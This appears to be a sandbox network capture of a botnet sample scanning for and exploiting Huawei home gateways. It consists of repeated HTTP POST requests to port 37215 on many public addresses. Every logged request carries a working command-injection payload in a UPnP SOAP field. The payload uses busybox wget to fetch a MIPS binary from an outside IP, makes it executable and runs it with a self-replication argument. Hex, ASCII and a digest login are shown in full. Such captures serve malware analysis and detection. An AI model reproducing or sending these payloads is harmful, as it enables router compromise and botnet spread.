2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  607192.168.2.1337122197.179.194.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.129693985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  608192.168.2.1345238197.3.55.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.129714966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  609192.168.2.134701241.214.74.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.129714966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  610192.168.2.1347018197.179.35.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.129784107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  611192.168.2.134275441.171.20.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.129787922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  612192.168.2.135541041.252.173.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.130124092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  613192.168.2.135803441.246.0.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.130137920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  614192.168.2.1337040197.73.68.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.130198002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  615192.168.2.1348744124.192.201.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.130250931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  616192.168.2.1347706192.41.179.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.130250931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  617192.168.2.133501441.63.127.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.130269051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
